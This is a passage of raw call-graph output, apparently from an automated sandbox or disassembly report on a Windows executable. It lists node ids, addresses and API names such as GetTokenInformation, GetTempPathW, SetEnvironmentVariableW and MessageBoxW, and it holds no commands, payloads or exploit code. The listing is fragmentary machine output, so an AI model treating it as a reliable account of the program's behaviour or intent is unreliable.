memcpy_s __scrt_get_show_window_mode 16745->16747 16746->16747 16747->16666 16749 7ff61d33e5eb 16748->16749 16753 7ff61d33e638 memcpy_s 16748->16753 16750 7ff61d33aed8 _invalid_parameter_noinfo 37 API calls 16749->16750 16751 7ff61d33e617 16750->16751 16751->16666 16752 7ff61d33e6a3 16754 7ff61d33ab3c __std_exception_copy 37 API calls 16752->16754 16753->16752 16755 7ff61d334a00 45 API calls 16753->16755 16758 7ff61d33e6e5 memcpy_s 16754->16758 16755->16752 16756 7ff61d33afc4 _wfindfirst32i64 17 API calls 16757 7ff61d33e790 16756->16757 16758->16756 16760 7ff61d330f81 16759->16760 16761 7ff61d330f93 16759->16761 16762 7ff61d3355c4 _findclose 11 API calls 16760->16762 16763 7ff61d330fa0 16761->16763 16768 7ff61d330fdd 16761->16768 16764 7ff61d330f86 16762->16764 16765 7ff61d33aed8 _invalid_parameter_noinfo 37 API calls 16763->16765 16766 7ff61d33afa4 _invalid_parameter_noinfo 37 API calls 16764->16766 16767 7ff61d330f91 16765->16767 16766->16767 16767->16512 16769 7ff61d331086 16768->16769 16770 7ff61d3355c4 _findclose 11 API calls 16768->16770 16769->16767 16771 7ff61d3355c4 _findclose 11 API calls 16769->16771 16772 7ff61d33107b 16770->16772 16773 7ff61d331130 16771->16773 16774 7ff61d33afa4 _invalid_parameter_noinfo 37 API calls 16772->16774 16775 7ff61d33afa4 _invalid_parameter_noinfo 37 API calls 16773->16775 16774->16769 16775->16767 16777 7ff61d33e091 16776->16777 16779 7ff61d334a3f 16776->16779 16778 7ff61d343a74 45 API calls 16777->16778 16777->16779 16778->16779 16780 7ff61d33e0e4 16779->16780 16781 7ff61d33e0fd 16780->16781 16782 7ff61d334a4f 16780->16782 16781->16782 16783 7ff61d342dc0 45 API calls 16781->16783 16782->16512 16783->16782 16791 7ff61d33546c EnterCriticalSection 16784->16791 16793 7ff61d3228ac 16792->16793 16794 7ff61d334bc4 49 API calls 16793->16794 16795 7ff61d3228fd 16794->16795 16796 7ff61d3355c4 _findclose 11 API calls 16795->16796 16797 7ff61d322902 16796->16797 16811 7ff61d3355e4 16797->16811 16800 7ff61d321ef0 49 API calls 16801 7ff61d322931 __scrt_get_show_window_mode 16800->16801 16802 7ff61d328be0 57 API calls 16801->16802 16803 7ff61d322966 16802->16803 16804 7ff61d32296b 16803->16804 16805 7ff61d3229a3 MessageBoxA 16803->16805 16806 7ff61d328be0 57 API calls 16804->16806 16807 7ff61d3229bd 16805->16807 16809 7ff61d322985 MessageBoxW 16806->16809 16808 7ff61d32bdc0 _wfindfirst32i64 8 API calls 16807->16808 16810 7ff61d3229cd 16808->16810 16809->16807 16810->16182 16812 7ff61d33b988 _findclose 11 API calls 16811->16812 16813 7ff61d3355fb 16812->16813 16814 7ff61d322909 16813->16814 16815 7ff61d33f258 _findclose 11 API calls 16813->16815 16816 7ff61d33563b 16813->16816 16814->16800 16817 7ff61d335630 16815->16817 16816->16814 16823 7ff61d33f928 16816->16823 16818 7ff61d33b00c __free_lconv_mon 11 API calls 16817->16818 16818->16816 16821 7ff61d33afc4 _wfindfirst32i64 17 API calls 16822 7ff61d335680 16821->16822 16826 7ff61d33f945 16823->16826 16824 7ff61d33f94a 16825 7ff61d3355c4 _findclose 11 API calls 16824->16825 16829 7ff61d335661 16824->16829 16831 7ff61d33f954 16825->16831 16826->16824 16828 7ff61d33f994 16826->16828 16826->16829 16827 7ff61d33afa4 _invalid_parameter_noinfo 37 API calls 16827->16829 16828->16829 16830 7ff61d3355c4 _findclose 11 API calls 16828->16830 16829->16814 16829->16821 16830->16831 16831->16827 16833 7ff61d328d14 WideCharToMultiByte 16832->16833 16834 7ff61d328d82 WideCharToMultiByte 16832->16834 16836 7ff61d328d3e 16833->16836 16839 7ff61d328d55 16833->16839 16835 7ff61d328daf 16834->16835 16840 7ff61d323f35 16834->16840 16837 7ff61d3229e0 57 API calls 16835->16837 16838 7ff61d3229e0 57 API calls 16836->16838 16837->16840 16838->16840 16839->16834 16841 7ff61d328d6b 16839->16841 16840->16191 16840->16194 16842 7ff61d3229e0 57 API calls 16841->16842 16842->16840 16844 7ff61d327bee 16843->16844 16845 7ff61d33aab3 16843->16845 16844->16209 16845->16844 16846 7ff61d33ab3c __std_exception_copy 37 API calls 16845->16846 16847 7ff61d33aae0 16846->16847 16847->16844 16848 7ff61d33afc4 _wfindfirst32i64 17 API calls 16847->16848 16849 7ff61d33ab10 16848->16849 16851 7ff61d323fe0 116 API calls 16850->16851 16852 7ff61d321ad6 16851->16852 16853 7ff61d3282c0 83 API calls 16852->16853 16860 7ff61d321c84 16852->16860 16855 7ff61d321b0e 16853->16855 16854 7ff61d32bdc0 _wfindfirst32i64 8 API calls 16856 7ff61d321c98 16854->16856 16882 7ff61d321b3f 16855->16882 16889 7ff61d330914 16855->16889 16856->16229 16883 7ff61d323e50 16856->16883 16858 7ff61d33028c 74 API calls 16858->16860 16859 7ff61d321b28 16861 7ff61d321b2c 16859->16861 16862 7ff61d321b44 16859->16862 16860->16854 16863 7ff61d322890 59 API calls 16861->16863 16893 7ff61d3305dc 16862->16893 16863->16882 16866 7ff61d321b77 16868 7ff61d330914 73 API calls 16866->16868 16867 7ff61d321b5f 16869 7ff61d322890 59 API calls 16867->16869 16870 7ff61d321bc4 16868->16870 16869->16882 16871 7ff61d321bd6 16870->16871 16872 7ff61d321bee 16870->16872 16873 7ff61d322890 59 API calls 16871->16873 16874 7ff61d3305dc _fread_nolock 53 API calls 16872->16874 16873->16882 16875 7ff61d321c03 16874->16875 16876 7ff61d321c09 16875->16876 16877 7ff61d321c1e 16875->16877 16879 7ff61d322890 59 API calls 16876->16879 16896 7ff61d330350 16877->16896 16879->16882 16881 7ff61d322b30 59 API calls 16881->16882 16882->16858 16884 7ff61d321ef0 49 API calls 16883->16884 16885 7ff61d323e6d 16884->16885 16885->16228 16887 7ff61d321ef0 49 API calls 16886->16887 16888 7ff61d324090 16887->16888 16888->16229 16890 7ff61d330944 16889->16890 16902 7ff61d3306a4 16890->16902 16892 7ff61d33095d 16892->16859 16914 7ff61d3305fc 16893->16914 16897 7ff61d330359 16896->16897 16898 7ff61d321c32 16896->16898 16899 7ff61d3355c4 _findclose 11 API calls 16897->16899 16898->16881 16898->16882 16900 7ff61d33035e 16899->16900 16901 7ff61d33afa4 _invalid_parameter_noinfo 37 API calls 16900->16901 16901->16898 16903 7ff61d33070e 16902->16903 16904 7ff61d3306ce 16902->16904 16903->16904 16905 7ff61d33071a 16903->16905 16906 7ff61d33aed8 _invalid_parameter_noinfo 37 API calls 16904->16906 16913 7ff61d33546c EnterCriticalSection 16905->16913 16907 7ff61d3306f5 16906->16907 16907->16892 16915 7ff61d330626 16914->16915 16916 7ff61d321b59 16914->16916 16915->16916 16917 7ff61d330635 __scrt_get_show_window_mode 16915->16917 16918 7ff61d330672 16915->16918 16916->16866 16916->16867 16921 7ff61d3355c4 _findclose 11 API calls 16917->16921 16927 7ff61d33546c EnterCriticalSection 16918->16927 16923 7ff61d33064a 16921->16923 16925 7ff61d33afa4 _invalid_parameter_noinfo 37 API calls 16923->16925 16925->16916 16929 7ff61d328721 __std_exception_copy 16928->16929 16930 7ff61d32869f GetTokenInformation 16928->16930 16932 7ff61d32873a 16929->16932 16933 7ff61d328734 CloseHandle 16929->16933 16931 7ff61d3286c0 GetLastError 16930->16931 16934 7ff61d3286cb 16930->16934 16931->16929 16931->16934 16932->16238 16933->16932 16934->16929 16935 7ff61d3286e7 GetTokenInformation 16934->16935 16935->16929 16936 7ff61d32870a 16935->16936 16936->16929 16937 7ff61d328714 ConvertSidToStringSidW 16936->16937 16937->16929 16939 7ff61d328775 16938->16939 16955 7ff61d334e18 16939->16955 16943 7ff61d322c70 16942->16943 16944 7ff61d334bc4 49 API calls 16943->16944 16945 7ff61d322cbb __scrt_get_show_window_mode 16944->16945 16946 7ff61d328be0 57 API calls 16945->16946 16947 7ff61d322cf0 16946->16947 16948 7ff61d322d2d MessageBoxA 16947->16948 16949 7ff61d322cf5 16947->16949 16951 7ff61d322d47 16948->16951 16950 7ff61d328be0 57 API calls 16949->16950 16952 7ff61d322d0f MessageBoxW 16950->16952 16953 7ff61d32bdc0 _wfindfirst32i64 8 API calls 16951->16953 16952->16951 16954 7ff61d322d57 16953->16954 16954->16248 16958 7ff61d334e72 16955->16958 16956 7ff61d334e97 16957 7ff61d33aed8 _invalid_parameter_noinfo 37 API calls 16956->16957 16972 7ff61d334ec1 16957->16972 16958->16956 16959 7ff61d334ed3 16958->16959 16973 7ff61d3331d0 16959->16973 16961 7ff61d334fb4 16963 7ff61d33b00c __free_lconv_mon 11 API calls 16961->16963 16962 7ff61d32bdc0 _wfindfirst32i64 8 API calls 16965 7ff61d328798 16962->16965 16963->16972 16965->16245 16966 7ff61d334f89 16968 7ff61d33b00c __free_lconv_mon 11 API calls 16966->16968 16967 7ff61d334fda 16967->16961 16970 7ff61d334fe4 16967->16970 16968->16972 16969 7ff61d334f80 16969->16961 16969->16966 16971 7ff61d33b00c __free_lconv_mon 11 API calls 16970->16971 16971->16972 16972->16962 16974 7ff61d33320e 16973->16974 16975 7ff61d3331fe 16973->16975 16976 7ff61d333217 16974->16976 16981 7ff61d333245 16974->16981 16977 7ff61d33aed8 _invalid_parameter_noinfo 37 API calls 16975->16977 16978 7ff61d33aed8 _invalid_parameter_noinfo 37 API calls 16976->16978 16979 7ff61d33323d 16977->16979 16978->16979 16979->16961 16979->16966 16979->16967 16979->16969 16981->16975 16981->16979 16984 7ff61d333be4 16981->16984 17017 7ff61d333630 16981->17017 17054 7ff61d332dc0 16981->17054 16985 7ff61d333c26 16984->16985 16986 7ff61d333c97 16984->16986 16989 7ff61d333c2c 16985->16989 16990 7ff61d333cc1 16985->16990 16987 7ff61d333c9c 16986->16987 16988 7ff61d333cf0 16986->16988 16991 7ff61d333cd1 16987->16991 16992 7ff61d333c9e 16987->16992 16996 7ff61d333d07 16988->16996 16997 7ff61d333cfa 16988->16997 17002 7ff61d333cff 16988->17002 16993 7ff61d333c60 16989->16993 16994 7ff61d333c31 16989->16994 17073 7ff61d331f94 16990->17073 17080 7ff61d331b84 16991->17080 16995 7ff61d333c40 16992->16995 17005 7ff61d333cad 16992->17005 16999 7ff61d333c37 16993->16999 16993->17002 16994->16996 16994->16999 17015 7ff61d333d30 16995->17015 17057 7ff61d334398 16995->17057 17087 7ff61d3348ec 16996->17087 16997->16990 16997->17002 16999->16995 17004 7ff61d333c72 16999->17004 17012 7ff61d333c5b 16999->17012 17002->17015 17091 7ff61d3323a4 17002->17091 17004->17015 17067 7ff61d3346d4 17004->17067 17005->16990 17007 7ff61d333cb2 17005->17007 17010 7ff61d334798 37 API calls 17007->17010 17007->17015 17009 7ff61d32bdc0 _wfindfirst32i64 8 API calls 17011 7ff61d33402a 17009->17011 17010->17012 17011->16981 17013 7ff61d334a00 45 API calls 17012->17013 17012->17015 17016 7ff61d333f1c 17012->17016 17013->17016 17015->17009 17016->17015 17098 7ff61d33f0c8 17016->17098 17018 7ff61d33363e 17017->17018 17019 7ff61d333654 17017->17019 17020 7ff61d333694 17018->17020 17021 7ff61d333c26 17018->17021 17022 7ff61d333c97 17018->17022 17019->17020 17023 7ff61d33aed8 _invalid_parameter_noinfo 37 API calls 17019->17023 17020->16981 17026 7ff61d333c2c 17021->17026 17027 7ff61d333cc1 17021->17027 17024 7ff61d333c9c 17022->17024 17025 7ff61d333cf0 17022->17025 17023->17020 17028 7ff61d333cd1 17024->17028 17029 7ff61d333c9e 17024->17029 17033 7ff61d333d07 17025->17033 17034 7ff61d333cfa 17025->17034 17039 7ff61d333cff 17025->17039 17030 7ff61d333c60 17026->17030 17031 7ff61d333c31 17026->17031 17035 7ff61d331f94 38 API calls 17027->17035 17037 7ff61d331b84 38 API calls 17028->17037 17032 7ff61d333c40 17029->17032 17043 7ff61d333cad 17029->17043 17036 7ff61d333c37 17030->17036 17030->17039 17031->17033 17031->17036 17038 7ff61d334398 47 API calls 17032->17038 17053 7ff61d333d30 17032->17053 17040 7ff61d3348ec 45 API calls 17033->17040 17034->17027 17034->17039 17051 7ff61d333c5b 17035->17051 17036->17032 17041 7ff61d333c72 17036->17041 17036->17051 17037->17051 17038->17051 17042 7ff61d3323a4 38 API calls 17039->17042 17039->17053 17040->17051 17044 7ff61d3346d4 46 API calls 17041->17044 17041->17053 17042->17051 17043->17027 17045 7ff61d333cb2 17043->17045 17044->17051 17047 7ff61d334798 37 API calls 17045->17047 17045->17053 17046 7ff61d32bdc0 _wfindfirst32i64 8 API calls 17048 7ff61d33402a 17046->17048 17047->17051 17048->16981 17049 7ff61d334a00 45 API calls 17052 7ff61d333f1c 17049->17052 17050 7ff61d33f0c8 46 API calls 17050->17052 17051->17049 17051->17052 17051->17053 17052->17050 17052->17053 17053->17046 17129 7ff61d331208 17054->17129 17058 7ff61d3343be 17057->17058 17059 7ff61d330dc0 12 API calls 17058->17059 17060 7ff61d33440e 17059->17060 17061 7ff61d33ec30 46 API calls 17060->17061 17062 7ff61d3344e1 17061->17062 17063 7ff61d334a00 45 API calls 17062->17063 17064 7ff61d334503 17062->17064 17063->17064 17065 7ff61d334a00 45 API calls 17064->17065 17066 7ff61d334591 17064->17066 17065->17066 17066->17012 17069 7ff61d334709 17067->17069 17068 7ff61d334727 17071 7ff61d33f0c8 46 API calls 17068->17071 17069->17068 17070 7ff61d334a00 45 API calls 17069->17070 17072 7ff61d33474e 17069->17072 17070->17068 17071->17072 17072->17012 17074 7ff61d331fc7 17073->17074 17075 7ff61d331ff6 17074->17075 17077 7ff61d3320b3 17074->17077 17079 7ff61d332033 17075->17079 17110 7ff61d330e68 17075->17110 17078 7ff61d33aed8 _invalid_parameter_noinfo 37 API calls 17077->17078 17078->17079 17079->17012 17081 7ff61d331bb7 17080->17081 17082 7ff61d331be6 17081->17082 17084 7ff61d331ca3 17081->17084 17083 7ff61d330e68 12 API calls 17082->17083 17086 7ff61d331c23 17082->17086 17083->17086 17085 7ff61d33aed8 _invalid_parameter_noinfo 37 API calls 17084->17085 17085->17086 17086->17012 17088 7ff61d33492f 17087->17088 17090 7ff61d334933 __crtLCMapStringW 17088->17090 17118 7ff61d334988 17088->17118 17090->17012 17092 7ff61d3323d7 17091->17092 17093 7ff61d332406 17092->17093 17095 7ff61d3324c3 17092->17095 17094 7ff61d330e68 12 API calls 17093->17094 17097 7ff61d332443 17093->17097 17094->17097 17096 7ff61d33aed8 _invalid_parameter_noinfo 37 API calls 17095->17096 17096->17097 17097->17012 17100 7ff61d33f0f9 17098->17100 17108 7ff61d33f107 17098->17108 17099 7ff61d33f127 17102 7ff61d33f138 17099->17102 17103 7ff61d33f15f 17099->17103 17100->17099 17101 7ff61d334a00 45 API calls 17100->17101 17100->17108 17101->17099 17122 7ff61d340b80 17102->17122 17105 7ff61d33f189 17103->17105 17106 7ff61d33f1ea 17103->17106 17103->17108 17105->17108 17109 7ff61d33fd00 _fread_nolock MultiByteToWideChar 17105->17109 17107 7ff61d33fd00 _fread_nolock MultiByteToWideChar 17106->17107 17107->17108 17108->17016 17109->17108 17111 7ff61d330e9f 17110->17111 17117 7ff61d330e8e 17110->17117 17112 7ff61d33dcbc _fread_nolock 12 API calls 17111->17112 17111->17117 17113 7ff61d330ed0 17112->17113 17114 7ff61d330ee4 17113->17114 17115 7ff61d33b00c __free_lconv_mon 11 API calls 17113->17115 17116 7ff61d33b00c __free_lconv_mon 11 API calls 17114->17116 17115->17114 17116->17117 17117->17079 17119 7ff61d3349a6 17118->17119 17120 7ff61d3349ae 17118->17120 17121 7ff61d334a00 45 API calls 17119->17121 17120->17090 17121->17120 17125 7ff61d3477e0 17122->17125 17130 7ff61d33123d 17129->17130 17131 7ff61d33124f 17129->17131 17132 7ff61d3355c4 _findclose 11 API calls 17130->17132 17134 7ff61d33125d 17131->17134 17138 7ff61d331299 17131->17138 17133 7ff61d331242 17132->17133 17135 7ff61d33afa4 _invalid_parameter_noinfo 37 API calls 17133->17135 17136 7ff61d33aed8 _invalid_parameter_noinfo 37 API calls 17134->17136 17141 7ff61d33124d 17135->17141 17136->17141 17137 7ff61d331615 17139 7ff61d3355c4 _findclose 11 API calls 17137->17139 17137->17141 17138->17137 17140 7ff61d3355c4 _findclose 11 API calls 17138->17140 17142 7ff61d3318a9 17139->17142 17143 7ff61d33160a 17140->17143 17141->16981 17144 7ff61d33afa4 _invalid_parameter_noinfo 37 API calls 17142->17144 17145 7ff61d33afa4 _invalid_parameter_noinfo 37 API calls 17143->17145 17144->17141 17145->17137 17147 7ff61d327976 17146->17147 17148 7ff61d32799a 17147->17148 17149 7ff61d3279ed GetTempPathW 17147->17149 17151 7ff61d327b70 61 API calls 17148->17151 17150 7ff61d327a02 17149->17150 17185 7ff61d322830 17150->17185 17152 7ff61d3279a6 17151->17152 17197 7ff61d327430 17152->17197 17158 7ff61d32bdc0 _wfindfirst32i64 8 API calls 17160 7ff61d32154f 17158->17160 17160->16252 17160->16256 17162 7ff61d327ac6 17166 7ff61d328cf0 59 API calls 17162->17166 17163 7ff61d327a1b __std_exception_copy 17163->17162 17168 7ff61d327a51 17163->17168 17189 7ff61d338ba4 17163->17189 17192 7ff61d328b80 17163->17192 17170 7ff61d327ad7 __std_exception_copy 17166->17170 17169 7ff61d328be0 57 API calls 17168->17169 17184 7ff61d327a8a __std_exception_copy 17168->17184 17171 7ff61d327a67 17169->17171 17172 7ff61d328be0 57 API calls 17170->17172 17170->17184 17173 7ff61d327aa9 SetEnvironmentVariableW 17171->17173 17174 7ff61d327a6c 17171->17174 17175 7ff61d327af5 17172->17175 17173->17184 17176 7ff61d328be0 57 API calls 17174->17176 17184->17158 17186 7ff61d322855 17185->17186 17187 7ff61d334e18 48 API calls 17186->17187 17188 7ff61d322874 17187->17188 17188->17163 17231 7ff61d3387d0 17189->17231 17193 7ff61d328ba6 CreateDirectoryW 17192->17193 17194 7ff61d328b90 17192->17194 17193->17163 17195 7ff61d322c50 59 API calls 17194->17195 17196 7ff61d328b9c 17195->17196 17196->17163 17198 7ff61d32743c 17197->17198 17199 7ff61d328be0 57 API calls 17198->17199 17200 7ff61d32745e 17199->17200 17201 7ff61d327466 17200->17201 17202 7ff61d327479 ExpandEnvironmentStringsW 17200->17202 17203 7ff61d322b30 59 API calls 17201->17203 17204 7ff61d32749f __std_exception_copy 17202->17204 17210 7ff61d327472 17203->17210 17205 7ff61d3274b6 17204->17205 17206 7ff61d3274a3 17204->17206 17211 7ff61d3274d0 17205->17211 17212 7ff61d3274c4 17205->17212 17208 7ff61d322b30 59 API calls 17206->17208 17207 7ff61d32bdc0 _wfindfirst32i64 8 API calls 17209 7ff61d327598 17207->17209 17208->17210 17209->17184 17210->17207 17364 7ff61d336428 17211->17364 17357 7ff61d337aa4 17212->17357 17272 7ff61d341cc8 17231->17272 17331 7ff61d341a40 17272->17331 17352 7ff61d340db8 EnterCriticalSection 17331->17352 17358 7ff61d337ac2 17357->17358 17361 7ff61d337af5 17357->17361 17358->17361 17474 7ff61d321726 17473->17474 17475 7ff61d32173e 17473->17475 17476 7ff61d322b30 59 API calls 17474->17476 17477 7ff61d321768 17475->17477 17478 7ff61d321744 17475->17478 17481 7ff61d321732 17476->17481 17566 7ff61d327c20 17477->17566 17603 7ff61d3212b0 17478->17603 17481->16280 17484 7ff61d32175f 17484->16280 17485 7ff61d3217b9 17489 7ff61d323fe0 116 API calls 17485->17489 17486 7ff61d32178d 17488 7ff61d322890 59 API calls 17486->17488 17487 7ff61d322b30 59 API calls 17487->17484 17490 7ff61d3217a3 17488->17490 17491 7ff61d3217ce 17489->17491 17490->16280 17492 7ff61d3217d6 17491->17492 17493 7ff61d3217ee 17491->17493 17495 7ff61d322b30 59 API calls 17492->17495 17494 7ff61d330914 73 API calls 17493->17494 17497 7ff61d3217ff 17494->17497 17496 7ff61d3217e5 17495->17496 17501 7ff61d33028c 74 API calls 17496->17501 17498 7ff61d321823 17497->17498 17499 7ff61d321803 17497->17499 17502 7ff61d321829 17498->17502 17503 7ff61d321841 17498->17503 17500 7ff61d322890 59 API calls 17499->17500 17509 7ff61d321819 __std_exception_copy 17500->17509 17504 7ff61d321937 17501->17504 17585 7ff61d321050 17502->17585 17507 7ff61d321863 17503->17507 17513 7ff61d321882 17503->17513 17504->16280 17506 7ff61d33028c 74 API calls 17506->17496 17508 7ff61d322890 59 API calls 17507->17508 17508->17509 17509->17506 17510 7ff61d3305dc _fread_nolock 53 API calls 17510->17513 17511 7ff61d3218e5 17513->17509 17513->17510 17513->17511 17642 7ff61d330d1c 17513->17642 17516 7ff61d322d86 17515->17516 17517 7ff61d321ef0 49 API calls 17516->17517 17519 7ff61d322db9 17517->17519 17518 7ff61d3230ea 17519->17518 17520 7ff61d323e50 49 API calls 17519->17520 17521 7ff61d322e27 17520->17521 17522 7ff61d323e50 49 API calls 17521->17522 17523 7ff61d322e38 17522->17523 17524 7ff61d322e59 17523->17524 17525 7ff61d322e95 17523->17525 17725 7ff61d3231b0 17524->17725 17527 7ff61d3231b0 75 API calls 17525->17527 17528 7ff61d322e93 17527->17528 17529 7ff61d322f16 17528->17529 17530 7ff61d322ed4 17528->17530 17531 7ff61d3231b0 75 API calls 17529->17531 17733 7ff61d3275b0 17530->17733 17534 7ff61d322f40 17531->17534 17538 7ff61d3231b0 75 API calls 17534->17538 17543 7ff61d322fdc 17534->17543 17536 7ff61d323171 17542 7ff61d322b30 59 API calls 17536->17542 17540 7ff61d322f72 17538->17540 17539 7ff61d322f11 17540->17543 17546 7ff61d3231b0 75 API calls 17540->17546 17541 7ff61d321eb0 59 API calls 17544 7ff61d32302f 17541->17544 17542->17518 17543->17541 17548 7ff61d3230ef 17543->17548 17544->17518 17550 7ff61d321ef0 49 API calls 17544->17550 17549 7ff61d322fa0 17546->17549 17553 7ff61d323148 17548->17553 17770 7ff61d335170 17548->17770 17549->17543 17551 7ff61d322fa4 17549->17551 17552 7ff61d323057 17550->17552 17554 7ff61d322b30 59 API calls 17551->17554 17552->17536 17555 7ff61d321ef0 49 API calls 17552->17555 17553->17536 17556 7ff61d322b30 59 API calls 17553->17556 17561 7ff61d321710 135 API calls 17553->17561 17554->17539 17556->17553 17561->17553 17567 7ff61d327c30 17566->17567 17568 7ff61d321ef0 49 API calls 17567->17568 17569 7ff61d327c71 17568->17569 17584 7ff61d327cf1 17569->17584 17646 7ff61d323f70 17569->17646 17571 7ff61d32bdc0 _wfindfirst32i64 8 API calls 17572 7ff61d321785 17571->17572 17572->17485 17572->17486 17573 7ff61d327d2b 17652 7ff61d3277d0 17573->17652 17577 7ff61d327d14 17581 7ff61d322c50 59 API calls 17577->17581 17578 7ff61d327ce0 17580 7ff61d322c50 59 API calls 17578->17580 17579 7ff61d327b70 61 API calls 17582 7ff61d327ca2 __std_exception_copy 17579->17582 17580->17584 17581->17573 17582->17577 17582->17578 17584->17571 17586 7ff61d3210a6 17585->17586 17604 7ff61d3212c2 17603->17604 17605 7ff61d323fe0 116 API calls 17604->17605 17606 7ff61d3212f2 17605->17606 17607 7ff61d3212fa 17606->17607 17608 7ff61d321311 17606->17608 17609 7ff61d322b30 59 API calls 17607->17609 17610 7ff61d330914 73 API calls 17608->17610 17639 7ff61d32130a __std_exception_copy 17609->17639 17611 7ff61d321323 17610->17611 17612 7ff61d321327 17611->17612 17613 7ff61d32134d 17611->17613 17614 7ff61d322890 59 API calls 17612->17614 17617 7ff61d321368 17613->17617 17618 7ff61d321390 17613->17618 17615 7ff61d32133e 17614->17615 17616 7ff61d33028c 74 API calls 17615->17616 17616->17639 17621 7ff61d322890 59 API calls 17617->17621 17622 7ff61d3213aa 17618->17622 17633 7ff61d321463 17618->17633 17619 7ff61d32bdc0 _wfindfirst32i64 8 API calls 17620 7ff61d321454 17619->17620 17620->17484 17620->17487 17624 7ff61d321383 17621->17624 17625 7ff61d321050 98 API calls 17622->17625 17623 7ff61d3213c3 17626 7ff61d33028c 74 API calls 17623->17626 17627 7ff61d33028c 74 API calls 17624->17627 17628 7ff61d3213bb 17625->17628 17629 7ff61d3213cf 17626->17629 17627->17639 17628->17623 17631 7ff61d3214d2 __std_exception_copy 17628->17631 17632 7ff61d3277d0 64 API calls 17629->17632 17630 7ff61d3305dc _fread_nolock 53 API calls 17630->17633 17637 7ff61d33028c 74 API calls 17631->17637 17634 7ff61d3213de 17632->17634 17633->17623 17633->17630 17635 7ff61d3214bb 17633->17635 17638 7ff61d321ef0 49 API calls 17634->17638 17634->17639 17636 7ff61d322890 59 API calls 17635->17636 17636->17631 17637->17639 17640 7ff61d32140c 17638->17640 17639->17619 17640->17639 17647 7ff61d323f7a 17646->17647 17648 7ff61d328be0 57 API calls 17647->17648 17649 7ff61d323fa2 17648->17649 17650 7ff61d32bdc0 _wfindfirst32i64 8 API calls 17649->17650 17651 7ff61d323fca 17650->17651 17651->17573 17651->17579 17651->17582 17653 7ff61d3277e0 17652->17653 17654 7ff61d321ef0 49 API calls 17653->17654 17655 7ff61d327811 17654->17655 17656 7ff61d327929 17655->17656 17657 7ff61d321ef0 49 API calls 17655->17657 17658 7ff61d32bdc0 _wfindfirst32i64 8 API calls 17656->17658 17660 7ff61d327838 17657->17660 17660->17656 17726 7ff61d3231e4 17725->17726 17727 7ff61d334bc4 49 API calls 17726->17727 17729 7ff61d32320a 17727->17729 17728 7ff61d32321b 17731 7ff61d32bdc0 _wfindfirst32i64 8 API calls 17728->17731 17729->17728 17785 7ff61d335eec 17729->17785 17732 7ff61d323239 17731->17732 17732->17528 17734 7ff61d3275be 17733->17734 17735 7ff61d323fe0 116 API calls 17734->17735 17736 7ff61d3275ed 17735->17736 17737 7ff61d321ef0 49 API calls 17736->17737 17738 7ff61d327616 17737->17738 17739 7ff61d32761d 17738->17739 17740 7ff61d323f70 57 API calls 17738->17740 17741 7ff61d327799 17739->17741 17744 7ff61d3276f9 17739->17744 17742 7ff61d327630 17740->17742 17743 7ff61d327795 17741->17743 17747 7ff61d33028c 74 API calls 17741->17747 17745 7ff61d3276b4 17742->17745 17752 7ff61d327b70 61 API calls 17742->17752 17758 7ff61d32764e __std_exception_copy 17742->17758 17915 7ff61d330324 17744->17915 17747->17743 17752->17758 17771 7ff61d33517d 17770->17771 17772 7ff61d3351aa 17770->17772 17774 7ff61d3355c4 _findclose 11 API calls 17771->17774 17778 7ff61d335134 17771->17778 17773 7ff61d3351cd 17772->17773 17776 7ff61d3351e9 17772->17776 17775 7ff61d3355c4 _findclose 11 API calls 17773->17775 17777 7ff61d335187 17774->17777 17780 7ff61d335098 45 API calls 17776->17780 17778->17548 17786 7ff61d335f09 17785->17786 17787 7ff61d335f15 17785->17787 17802 7ff61d335800 17786->17802 17789 7ff61d335098 45 API calls 17787->17789 17790 7ff61d335f3d 17789->17790 17791 7ff61d33f4e4 5 API calls 17790->17791 17792 7ff61d335f4d 17790->17792 17791->17792 17793 7ff61d335684 14 API calls 17792->17793 17794 7ff61d335fa5 17793->17794 17795 7ff61d335fbd 17794->17795 17798 7ff61d335fa9 17794->17798 17803 7ff61d335837 17802->17803 17804 7ff61d33581a 17802->17804 17803->17804 17806 7ff61d33584a CreateFileW 17803->17806 17805 7ff61d3355a4 _fread_nolock 11 API calls 17804->17805 17807 7ff61d33581f 17805->17807 17808 7ff61d33587e 17806->17808 17809 7ff61d3358b4 17806->17809 17811 7ff61d3355c4 _findclose 11 API calls 17807->17811 17827 7ff61d335954 GetFileType 17808->17827 17853 7ff61d335ddc 17809->17853 17814 7ff61d335827 17811->17814 17998 7ff61d3364dc 17997->17998 17999 7ff61d336502 17998->17999 18001 7ff61d336535 17998->18001 18000 7ff61d3355c4 _findclose 11 API calls 17999->18000 18002 7ff61d336507 18000->18002 18003 7ff61d336548 18001->18003 18004 7ff61d33653b 18001->18004 18005 7ff61d33afa4 _invalid_parameter_noinfo 37 API calls 18002->18005 18016 7ff61d33b2ec 18003->18016 18006 7ff61d3355c4 _findclose 11 API calls 18004->18006 18008 7ff61d324039 18005->18008 18006->18008 18008->16355 18029 7ff61d340db8 EnterCriticalSection 18016->18029 18377 7ff61d3391a0 18376->18377 18380 7ff61d338c7c 18377->18380 18379 7ff61d3391b9 18379->16365 18381 7ff61d338c97 18380->18381 18382 7ff61d338cc6 18380->18382 18383 7ff61d33aed8 _invalid_parameter_noinfo 37 API calls 18381->18383 18390 7ff61d33546c EnterCriticalSection 18382->18390 18385 7ff61d338cb7 18383->18385 18385->18379 18392 7ff61d330083 18391->18392 18394 7ff61d3300b1 18391->18394 18393 7ff61d33aed8 _invalid_parameter_noinfo 37 API calls 18392->18393 18396 7ff61d3300a3 18393->18396 18394->18396 18401 7ff61d33546c EnterCriticalSection 18394->18401 18396->16369 18403 7ff61d323fe0 116 API calls 18402->18403 18404 7ff61d3215c7 18403->18404 18405 7ff61d3215cf 18404->18405 18406 7ff61d3215f0 18404->18406 18407 7ff61d322b30 59 API calls 18405->18407 18408 7ff61d330914 73 API calls 18406->18408 18409 7ff61d3215df 18407->18409 18410 7ff61d321601 18408->18410 18409->16374 18411 7ff61d321621 18410->18411 18412 7ff61d321605 18410->18412 18414 7ff61d321651 18411->18414 18415 7ff61d321631 18411->18415 18413 7ff61d322890 59 API calls 18412->18413 18423 7ff61d32161c __std_exception_copy 18413->18423 18417 7ff61d321666 18414->18417 18422 7ff61d32167d 18414->18422 18416 7ff61d322890 59 API calls 18415->18416 18416->18423 18419 7ff61d321050 98 API calls 18417->18419 18418 7ff61d33028c 74 API calls 18420 7ff61d3216f7 18418->18420 18419->18423 18420->16374 18421 7ff61d3305dc _fread_nolock 53 API calls 18421->18422 18422->18421 18422->18423 18424 7ff61d3216be 18422->18424 18423->18418 18425 7ff61d322890 59 API calls 18424->18425 18425->18423 18428 